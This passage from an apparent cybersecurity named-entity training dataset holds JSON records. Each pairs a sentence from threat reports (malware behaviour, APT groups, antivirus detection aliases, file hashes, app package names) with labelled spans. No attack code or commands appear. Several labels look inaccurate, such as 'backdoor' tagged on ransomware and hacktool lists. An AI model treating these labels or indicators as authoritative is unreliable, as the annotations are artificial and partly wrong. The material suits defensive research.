Trojan-Dropper.Win32.Injector.jndt Trojan.Win32.DPD.dxvfcr Trojan.PWS.DPD.5 BKDR_COMFOO.SME BehavesLike.Win32.RansomWannaCry.ch Trojan.Win32.Spy W32/Risk.KUNB-3887 Trojan:Win32/Netnam.B Trojan-Dropper.Win32.Injector.jndt Trj/Zbot.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004133", "source": "cyner2_train"}} {"text": "This one-time cost provides a malicious customer with access to all the data on the server and endless other possibilities, such as using the access to launch further attacks.", "spans": {"THREAT_ACTOR: malicious customer": [[30, 48]], "SYSTEM: server": [[84, 90]]}, "info": {"id": "cyner2_train_004134", "source": "cyner2_train"}} {"text": "Instead, they first attempt to gain access to the machine, most likely through a more targeted attack or exploit, before manually triggering and executing the malware.", "spans": {"SYSTEM: machine,": [[50, 58]], "MALWARE: exploit,": [[105, 113]], "MALWARE: malware.": [[159, 167]]}, "info": {"id": "cyner2_train_004135", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Stimilani.FC.1099 Trojan.Zusy.D2F64E HackTool:MSIL/Stimilani.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004136", "source": "cyner2_train"}} {"text": "During the last hours, ESET researchers noticed that Eltima, the makers of the Elmedia Player software, have been distributing a version of their application trojanized with the OSX/Proton malware on their official website.", "spans": {"ORGANIZATION: ESET researchers": [[23, 39]], "ORGANIZATION: Eltima,": [[53, 60]], "SYSTEM: the Elmedia Player software,": [[75, 103]], "SYSTEM: application": [[146, 157]], "MALWARE: OSX/Proton malware": [[178, 196]]}, "info": {"id": "cyner2_train_004137", "source": "cyner2_train"}} {"text": "It appears that these threat actors have begun using Palo Alto Networks upcoming Cyber Security Summit hosted on November 3, 2016 in Jakarta, Indonesia as a lure to compromise targeted 
individuals.", "spans": {"THREAT_ACTOR: threat actors": [[22, 35]], "ORGANIZATION: Palo Alto Networks": [[53, 71]], "ORGANIZATION: Cyber Security Summit": [[81, 102]]}, "info": {"id": "cyner2_train_004138", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.DoS.26816 DDOS_DEPCHARG.11 Win32.Trojan.WisdomEyes.16070401.9500.9967 W32/Trojan.ROMV-7068 DDOS_DEPCHARG.11 Win.Trojan.Chubby-2 Trojan-DDoS.Win32.DepthCharge.c Trojan.Win32.DepthCharge.dfzl Trojan.Win32.Chubby.26816 Troj.W32.Chubby.11!c Trojan.Chubby.11 Trojan.Chubby.Win32.2 BehavesLike.Win32.Fake.mc Backdoor/VB.dc TR/Chubby.11 Trojan[DDoS]/Win32.DepthCharge Trojan.Heur.VB.bmLfcmhTrPni Trojan-DDoS.Win32.DepthCharge.c TrojanDDoS.DepthCharge Win32/Chubby.11 Win32.Trojan-ddos.Depthcharge.Lpbl Trojan.DDoS.DepthCharge!wR+hD336kwM Trojan-DDoS.Win32.DepthCharge W32/Chubby.11!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004141", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Trojan.Vbcrypt Spyware.Zbot Dropper.Small.Win32.2729 Trojan/Dropper.Small.dil Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Droplet.GN Win.Trojan.VB-9953 Trojan-Dropper.Win32.Small.dil Trojan.Win32.Small.wfby TrojWare.Win32.TrojanDropper.Small.dil0 Trojan.MulDrop.30852 BehavesLike.Win32.Downloader.mc Trojan-Dropper.Win32.Delf Trojan[Spy]/Win32.Zbot Trojan.Heur.E2A3DF Dropper.Small.86866 Trojan-Dropper.Win32.Small.dil Trojan/Win32.Batat.R4771 W32/Dropper.DIL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004143", "source": "cyner2_train"}} {"text": "Package Name SHA256 digest SHA1 certificate com.network.android ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.network.android 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 516f8f516cc0fd8db53785a48c0a86554f75c3ba Additional digests with links to Chrysaor As a result of our investigation we 
have identified these additional Chrysaor-related apps .", "spans": {"MALWARE: Chrysaor": [[329, 337]], "MALWARE: Chrysaor-related": [[407, 423]]}, "info": {"id": "cyner2_train_004144", "source": "cyner2_train"}} {"text": "The attacking IP addresses originated from very distinctive network ranges mostly associated with Chinese Internet service providers.", "spans": {"ORGANIZATION: Chinese Internet service providers.": [[98, 133]]}, "info": {"id": "cyner2_train_004146", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.Inject.exdppy Trojan.Win32.Z.Kryptik.258107 Troj.W32.Virtumonde.mCBt Trojan.Inject.60399 Trojan.Kryptik.Win32.1344676 BehavesLike.Win32.Worm.dc Trojan:Win32/Kexject.A Spyware/Win32.Zbot.C145539 Trj/CI.A Win32.Trojan.Inject.Auto", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004147", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Hekdor.88576 Backdoor/Hekdor.a Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.EEXH-5977 Win32/Hekdor.A BKDR_HEKDOR.A Win.Trojan.HackersDoor-6351576-1 Backdoor.Win32.Hackdoor.12 Trojan.Win32.Hekdor.gtcj Backdoor.Win32.Hackdoor.88576 Backdoor.W32.Hackdoor.f!c Backdoor.Win32.Hackdoor.~dy001 BackDoor.Hackdoor.22 Backdoor.Hekdor.Win32.1 BehavesLike.Win32.Virut.mh Trojan.Win32.Hekdor Trojan[Backdoor]/Win32.Hackdoor Win32.Hack.Hekdor.a.kcloud Trojan.Graftor.Elzob.D2551 Backdoor.Win32.Hackdoor.12 Backdoor/Win32.Hackdoor.R101239 Bck/Iroffer.BG Win32.Backdoor.Hackdoor.Pegb Backdoor.Hekdor.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004148", "source": "cyner2_train"}} {"text": "They find and share readily available code and use those to make their own malware.", "spans": {}, "info": {"id": "cyner2_train_004149", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004150", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: Trojan.Win32.Clicker.cysqcu Trojan.Click2.41012 TR/Storup.D.158 Trojan:Win32/Storup.D Trojan.Graftor.DA5F2 TrojanSpy.Gaxfid!V9zv1PzO78E Trojan.Win32.Spy Trj/CI.A Win32/Trojan.b34", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004153", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packer.W32.Katusha!c Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_TRACUR.SMVB Packed.Win32.Katusha.ac Trojan.Win32.Tracur.csqtnd Trojan.Win32.Z.Tracur.476672 TrojWare.Win32.Kryptik.BJLP TROJ_TRACUR.SMVB TR/Tracur.ujeuv Trojan/Win32.Diple Trojan.Mikey.D823E Packed.Win32.Katusha.ac Trojan/Win32.Tracur.R87716 Trojan.Tracur Win32/Boaxxe.BB Win32.Packed.Katusha.Aljh Trojan.Win32.Boaxxe Win32/Trojan.2ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004154", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownloaderLTB.Trojan Trojan.Win32.Scar!O Trojan.Scar.20261 Trojan/Scar.gfdd Trojan.Graftor.Elzob.D3707 TROJ_DLOADE.SMEP Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/SillyDl.HER TROJ_DLOADE.SMEP Win.Trojan.Scar-864 Virus.Win32.Lamer.vpqnl Trojan.DownLoader22.5119 TR/Taranis.2688 Trojan/Win32.Scar Trojan.Win32.A.Scar.100616 Trojan/Win32.Scar.R4127 Trojan.Scar Trojan.Win32.Sisproc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004155", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Cadlotcorg Trojan.DistTrack.stdr BKDR_DISTTRACK.E Win.Malware.StoneDrill-6012379-0 Trojan.Win32.Inject.wmyt Trojan.Win32.Inject.ekcbzj Trojan.Win32.Z.Inject.195072 Troj.W32.Inject!c Trojan.Stoned.5 Trojan.StoneDrill.Win32.2 BKDR_DISTTRACK.E W32/Trojan.CWLD-3265 Trojan.Inject.uoh TR/Injector.sgcfh Trojan/Win32.Inject Trojan.Razy.D1AF37 Trojan.Win32.Inject.wmyt Trojan:Win32/Cadlotcorg.A!dha Trojan/Win32.Injector.C1695778 Trojan.DiskWriter Trj/CI.A Win32/StoneDrill.A Win32.Trojan.Inject.Eddh Trojan.Inject!MGtoNAyL21Q 
Trojan.Win32.Cadlotcorg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004156", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win32.VirRansom.pc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004159", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Iframer.77312 Trojan.Iframer.aa Trojan.Win32.Iframer.aa Trojan/Iframer.aa Trojan.Iframer.X W32/DLoader.OAFQ Trojan.Win32.Iframer.aa TrojWare.Win32.Iframer.aa Trojan.Win32.Iframer.aa Trojan/Iframer.b Trojan.Win32.Iframer!IK Trojan:Win32/Ifrasif.A Trojan.Win32.Iframer.aa Trojan.Win32.Iframer", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004160", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D1DA5C Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.Steam.cwybnb TrojWare.Win32.PSW.Steathie.B2 Trojan.PWS.Steam.292 TR/PSW.Steathie.B PWS:MSIL/Pasdael.A W32/Sc!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004162", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PSW.Vorbeld.B Trojan/W32.Ikmet.307200 Trojan.PSW.Vorbeld.B Troj.IM.W32.Ikmet.e!c Trojan/Ikmet.e Trojan.PSW.Vorbeld.B TROJ_VORBELD.B TROJ_VORBELD.B Trojan.PSW.Vorbeld.B Trojan-IM.Win32.Ikmet.e Trojan.PSW.Vorbeld.B Trojan.Win32.Ikmet.diag Win32.Trojan-im.Ikmet.Lfzq Trojan.PSW.Vorbeld.B TrojWare.Win32.PSW.Vorbeld.B Trojan.PSW.Vorbeld.B Trojan.PWS.Special.11 Trojan.Ikmet.Win32.2 BehavesLike.Win32.Fareit.fz W32/Risk.ZFPE-4855 Trojan/PSW.Vorbeld.b TR/PSW.Vorbeld.b Trojan[IM]/Win32.Ikmet Win32.Troj.Vorbeld.b.kcloud PWS:Win32/Vorbeld.B Trojan-IM.Win32.Ikmet.e TScope.Trojan.VB Win32/PSW.Vorbeld.B Trojan.Ikmet!CCqyhhL0iag Backdoor.VB W32/Vorbeld.E!tr Win32/Trojan.IM.00b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004164", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.OnlineGames.AAGG 
Trojan.Magania.19302 Trojan.PWS.OnlineGames.AAGG TSPY_ONLINEG.IGO Win32.Trojan.WisdomEyes.16070401.9500.9932 Infostealer.Onlinegame Win32/Frethog.CIL TSPY_ONLINEG.IGO Win.Spyware.59235-2 Trojan-GameThief.Win32.OnLineGames.txbo Trojan.PWS.OnlineGames.AAGG Trojan.Win32.OnLineGames.lhee Troj.PSW32.W.QQPass.lpXN Trojan.PWS.OnlineGames.AAGG TrojWare.Win32.Trojan.Inject.~II Trojan.PWS.OnlineGames.AAGG Trojan.MulDrop4.15206 PWS-OnlineGames.co Trojan/PSW.OnLineGames.auru Trojan[GameThief]/Win32.WOW.gic Win32.Troj.OnlineGames.sd.kcloud Trojan.PWS.OnlineGames.AAGG Trojan.Win32.PSWIGames.11924.B Trojan.PWS.OnlineGames.AAGG Trojan/Win32.OnlineGameHack.C909 TrojanPSW.OnLineGames.nr Trojan-Spy.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004167", "source": "cyner2_train"}} {"text": "Cyphort has been monitoring how threat actors are exploiting computing resources from compromised victims to mine various crypto currencies.", "spans": {"ORGANIZATION: Cyphort": [[0, 7]], "THREAT_ACTOR: threat actors": [[32, 45]], "SYSTEM: exploiting computing": [[50, 70]]}, "info": {"id": "cyner2_train_004168", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Toxic.a BehavesLike.Win32.BadFile.jc Trojan.Win32.Ransom.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004169", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanRansom.Blocker Ransom_Blocker.R0C1C0DHU17 Win32.Trojan.WisdomEyes.16070401.9500.9605 Ransom_Blocker.R0C1C0DHU17 Trojan-Ransom.Win32.Blocker.kgrm Troj.Ransom.W32.Blocker!c BehavesLike.Win32.RansomCerber.gh W32/Trojan.DOGS-7123 W32.Trojan.Backdoor TR/Crypt.ZPACK.hmkaa Trojan-Ransom.Win32.Blocker.kgrm Trojan/Win32.Dapato.C1720332 Hoax.Blocker Trojan.Dropper Trj/CI.A Win32.Trojan.Blocker.Akzg Trojan.Blocker!U13z+V78Arg Win32/Trojan.Ransom.acc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004171", "source": "cyner2_train"}} {"text": "Since 
the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context.", "spans": {"ORGANIZATION: Kaspersky researchers": [[49, 70]], "ORGANIZATION: the international community": [[75, 102]]}, "info": {"id": "cyner2_train_004172", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win.Trojan.Dadobra-446 Trojan-Downloader.Win32.Banload.bnlx Trojan.Win32.Downloader.337408.M TrojWare.Win32.TrojanDownloader.Dadobra.~JK Trojan.DownLoader5.10443 Trojan-Downloader.Win32.Banload TrojanDownloader.Banload.bhs Trojan[Downloader]/Win32.Banload Trojan-Downloader.Win32.Banload.bnlx Trojan:Win32/Banload.A Downloader/Win32.Banload.C108589 Win32/Spy.Banker.WNS Win32.Trojan-downloader.Banload.Ebhk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004175", "source": "cyner2_train"}} {"text": "Let's examine a couple of interesting delivery techniques from an APT active for the past several years, the Spring Dragon APT.", "spans": {"THREAT_ACTOR: APT": [[66, 69]], "THREAT_ACTOR: Spring Dragon APT.": [[109, 127]]}, "info": {"id": "cyner2_train_004178", "source": "cyner2_train"}} {"text": "SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010.", "spans": {"MALWARE: SunOrcal": [[0, 8]], "SYSTEM: the C2s,": [[98, 106]]}, "info": {"id": "cyner2_train_004180", "source": "cyner2_train"}} {"text": "A backdoor also known as: TSPY_MALUMPOS.SM TSPY_MALUMPOS.SM Win.Trojan.MalumPOS-1 TR/AD.Siaacsia.ielmw Trojan:Win32/Malumpos.A Trojan/Win32.Malumpos.C1727078 Trojan-Spy.MalumPOS Win32/Trojan.Spy.958", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004181", "source": "cyner2_train"}} {"text": "An aside: the rootkit does appear to be named after the Pokémon of the same name.", "spans": {"MALWARE: rootkit": [[14, 
21]]}, "info": {"id": "cyner2_train_004183", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Hacktool.EH Trojan/W32.HackTool.215552 Trojan.Mauvaise.SL1 Win.Tool.Wincred-6333920-0 Application.Hacktool.EH HackTool.Win64.WinCred.c Application.Hacktool.EH Application.Hacktool.EH Tool.WinCred.1 BehavesLike.Win64.BrowseFox.dh W64/Application.WFWG-6345 Application.Hacktool.EH HackTool.Win64.WinCred.c Application.Hacktool.EH HackTool.Win64 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004184", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper/W32.Dapato.26112 Trojan-Dropper.Win32.Dapato!O BackdoorAPT.Hikiti.G4 Win32.Trojan.WisdomEyes.16070401.9500.9983 Backdoor.Trojan BKDR_FEXEL.MM Backdoor.Win32.Fexel.b Trojan.Win32.Dapato.ceuzkz Trojan.DownLoader10.12491 BehavesLike.Win32.Downloader.mc Trojan.Win32.Farfli W32/Backdoor.QCOF-8324 Trojan[Dropper]/Win32.Dapato Trojan.Heur.E97E22 Troj.Dropper.W32.Dapato.dawi!c Backdoor.Win32.Fexel.b Backdoor:Win32/Hikiti.G!dha Dropper/Win32.Dapato.C199271 Win32.Backdoor.Fexel.Wvkt Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004186", "source": "cyner2_train"}} {"text": "It is assumed that actors using the malware are targeting small- to medium-sized businesses given the malware's focus on VNC applications.", "spans": {"THREAT_ACTOR: actors": [[19, 25]], "MALWARE: malware": [[36, 43]], "ORGANIZATION: small- to medium-sized businesses": [[58, 91]], "MALWARE: malware's": [[102, 111]], "SYSTEM: VNC applications.": [[121, 138]]}, "info": {"id": "cyner2_train_004188", "source": "cyner2_train"}} {"text": "In spite of these commonalities, we have not identified any firm links between the two groups.", "spans": {}, "info": {"id": "cyner2_train_004189", "source": "cyner2_train"}} {"text": "This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.", "spans": {"SYSTEM: 
infrastructure": [[44, 58]], "THREAT_ACTOR: Carbanak campaigns.": [[92, 111]]}, "info": {"id": "cyner2_train_004191", "source": "cyner2_train"}} {"text": "“ The takeaway ? Internet users should keep on securing their activities with good security solutions for both computers and mobile devices. ” Hashes : E5212D4416486AF42E7ED1F58A526AEF77BE89BE A9891222232145581FE8D0D483EDB4B18836BCFC AFF9F39A6CA5D68C599B30012D79DA29E2672C6E Insidious Android malware gives up all malicious features but one to gain stealth ESET researchers detect a new way of misusing Accessibility Service , the Achilles ’ heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim ’ s bank account or cryptocurrency wallet and taking over their email or social media accounts .", "spans": {"SYSTEM: Android": [[285, 292], [450, 457], [543, 550]], "ORGANIZATION: ESET": [[357, 361], [489, 493]]}, "info": {"id": "cyner2_train_004193", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ArchSMS!Tf0HkXJW05g Hoax.Win32.ArchSMS.hqqg Hoax.ArchSMS.hqqg SecurityRisk.PremiumSMSScam Hoax.Win32.ArchSMS Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004194", "source": "cyner2_train"}} {"text": "The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used.", "spans": {"MALWARE: family": [[8, 14]]}, "info": {"id": "cyner2_train_004195", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Koutodoor!IK Backdoor:Win32/Koutodoor.B Backdoor.Win32.Koutodoor.da SHeur2.AIKX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004197", "source": "cyner2_train"}} {"text": "The StreamEx family has the ability to access and modify the user's file system, modify the registry, create system services, enumerate 
process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands.", "spans": {"MALWARE: The StreamEx family": [[0, 19]], "SYSTEM: user's file system,": [[61, 80]], "SYSTEM: system": [[109, 115], [148, 154]], "SYSTEM: network": [[178, 185]], "SYSTEM: firewall products": [[245, 262]], "SYSTEM: antivirus products,": [[267, 286]]}, "info": {"id": "cyner2_train_004199", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Comfold Trojan:Win32/Comfold.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004201", "source": "cyner2_train"}} {"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ .", "spans": {"ORGANIZATION: Facebook": [[307, 315]]}, "info": {"id": "cyner2_train_004203", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.AutoRun.Win32.132231 Win32.Trojan.ServStart.a Win.Trojan.Qhost-160 Trojan.Win32.AutoRun.cvpwhj Trojan.DownLoader4.40333 BehavesLike.Win32.Ipamor.lm TR/Dldr.JKCN Trojan/Win32.Downloader.C40577 Trojan.Win32.Wc Win32/AutoRun.PT Trojan-Proxy.Win32.Ranky", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004204", "source": "cyner2_train"}} {"text": "The handful of malicious features densely packed in this new malware also includes 
the ability to drop other malware.", "spans": {"MALWARE: malicious": [[15, 24]], "MALWARE: malware": [[61, 68]], "MALWARE: malware.": [[109, 117]]}, "info": {"id": "cyner2_train_004205", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ShipBHQc.Trojan Trojan.Win32.ShipUp!O TrojanPWS.Zbot.Y Trojan/Kryptik.awzk Trojan.Razy.D3C5B TROJ_KRYPTK.SML3 Win.Trojan.Redirect-6055402-0 Trojan.Win32.ShipUp.brmnrc Trojan.Redirect.140 Trojan.ShipUp.Win32.1152 TROJ_KRYPTK.SML3 BehavesLike.Win32.PWSZbot.dh Trojan.Win32.ShipUp Trojan/ShipUp.ix TR/Rogue.kdz.11287.3 Trojan/Win32.ShipUp TrojanDropper:Win32/Gepys.A Troj.W32.ShipUp.lINm Trojan/Win32.Shipup.R58491 TScope.Malware-Cryptor.SB Trojan.FakeMS.ED W32/Kryptik.AYTK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004209", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy.Win32.Tibia!O Win32.Trojan.WisdomEyes.16070401.9500.9963 Trojan.Win32.Drop.cbndjf Trojan.MulDrop3.1226 BehavesLike.Win32.BadFile.rc Trojan-Dropper.Win32.Monya TR/Drop.Tibdef.B Trojan.Raldhep.1 TrojanDropper:Win32/Tibdef.B W32/Dropper.AAAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004210", "source": "cyner2_train"}} {"text": "It is in use by the Molerats aka Gaza cybergang, a politically motivated group whose main objective, we believe, is intelligence gathering.", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang,": [[33, 48]], "THREAT_ACTOR: politically motivated group": [[51, 78]]}, "info": {"id": "cyner2_train_004211", "source": "cyner2_train"}} {"text": "The Magnitude exploit kit has been using an XML configuration file critical to retrieving the malware payload Cerber for several months already.", "spans": {"MALWARE: The Magnitude exploit kit": [[0, 25]], "MALWARE: the malware payload Cerber": [[90, 116]]}, "info": {"id": "cyner2_train_004212", "source": "cyner2_train"}} {"text": "Here is Forcepoint Security Labs we have 
seen a number of changes and improvements over the last few months.", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[8, 32]]}, "info": {"id": "cyner2_train_004213", "source": "cyner2_train"}} {"text": "The actors compromised the sites of a local television network, educational organizations, a religious institute, and a known political party in Taiwan; and a popular news site in Hong Kong.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "ORGANIZATION: local television network, educational organizations, a religious institute,": [[38, 113]], "ORGANIZATION: a known political party": [[118, 141]], "ORGANIZATION: a popular news site": [[157, 176]]}, "info": {"id": "cyner2_train_004214", "source": "cyner2_train"}} {"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok was somewhat pared down compared to the Russian one .", "spans": {"SYSTEM: Google Play": [[75, 86]]}, "info": {"id": "cyner2_train_004216", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.O W32/Trojan2.OALA W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 BehavesLike.Win32.Virut.cc W32/Trojan.JXET-3602 Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 W32.Virut.lM6H Virus.Win32.Virut.ce TrojanClicker:MSIL/Xobnff.A Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Virus.Win32.Virut W32/Virut.CE Virus.Win32.Virut.M", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004218", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Zegost.FC.2167 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.DownLoader22.48526 BehavesLike.Win32.Trojan.cc Trojan.MSIL.Bladabindi.1 MSIL/Injector.PJG!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004219", "source": "cyner2_train"}} {"text": "Sinkhole data explained below shows just how quickly this campaign is impacting victims.", "spans": {"THREAT_ACTOR: campaign": [[58, 66]]}, "info": {"id": "cyner2_train_004222", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Netstop.A Trojan.Netstop.A Backdoor.Trojan Win32/Noshare.N TROJ_NETSTOPA.A Trojan.Netstop.A Trojan.Win32.Netstop.dyylkw Win32.Trojan-spy.Gc.Hsii Trojan.Netstop.A Worm.Win32.SpyBot.GC Trojan.Netstop.A Email-Worm.Win32.GOPworm.196 TROJ_NETSTOPA.A TR/Netstop.A Trojan.Netstop.A Trojan.Netstop.A Email-Worm.Win32.GOPworm.196 Win32/SpyBot.GC Worm.SpyBot!FiFtixQJKm8 W32/Netstop.A!tr Bck/Secur.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004223", "source": "cyner2_train"}} {"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]], "MALWARE: malware,": [[71, 79]], "MALWARE: tools,": [[123, 129]], "THREAT_ACTOR: operations": [[150, 160]]}, "info": {"id": "cyner2_train_004224", "source": "cyner2_train"}} {"text": "In recent years, the detention and interrogation of members of online communities has been publicized by state media for propaganda purposes.", "spans": {"ORGANIZATION: members": [[52, 59]], "ORGANIZATION: online communities": [[63, 81]], "ORGANIZATION: state media": [[105, 116]]}, "info": {"id": "cyner2_train_004227", 
"source": "cyner2_train"}} {"text": "PaloAlto Unit 42 researchers have observed a new Remote Access Tool RAT constructed by an unknown actor of Italian origin.", "spans": {"ORGANIZATION: PaloAlto Unit 42 researchers": [[0, 28]], "MALWARE: Remote Access Tool RAT": [[49, 71]], "THREAT_ACTOR: unknown actor": [[90, 103]]}, "info": {"id": "cyner2_train_004228", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject.IA Trojan.Skeeyah.8818 Infostealer.Kegotip!gm TSPY_KEGOTIP.SMA Trojan.Inject.IA Trojan-PSW.Win32.Minari.a Trojan.Inject.IA Trojan.Inject.IA Trojan.Inject.IA Trojan.PWS.Stealer.2518 TSPY_KEGOTIP.SMA BehavesLike.Win32.Backdoor.ch Trojan[PSW]/Win32.Minari Trojan.Inject.IA Trojan-PSW.Win32.Minari.a Trojan/Win32.PWS.R100577 Trojan.Inject.IA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004229", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Mutopy!O Trojan.Mutopy.A TROJ_MUTOPY.SMYN Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_MUTOPY.SMYN Win.Trojan.Multi-6413508-0 Troj.Dropper.W32.Dapato.lCcB Trojan.MulDrop4.10927 BehavesLike.Win32.Downloader.hh TR/Kazy.34213.jh Trojan:Win32/Mutopy.A Trojan.Naffy.1 Trojan/Win32.HDC.C53646 TScope.Malware-Cryptor.SB Trojan.Win32.Jorik W32/Rodecap.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004231", "source": 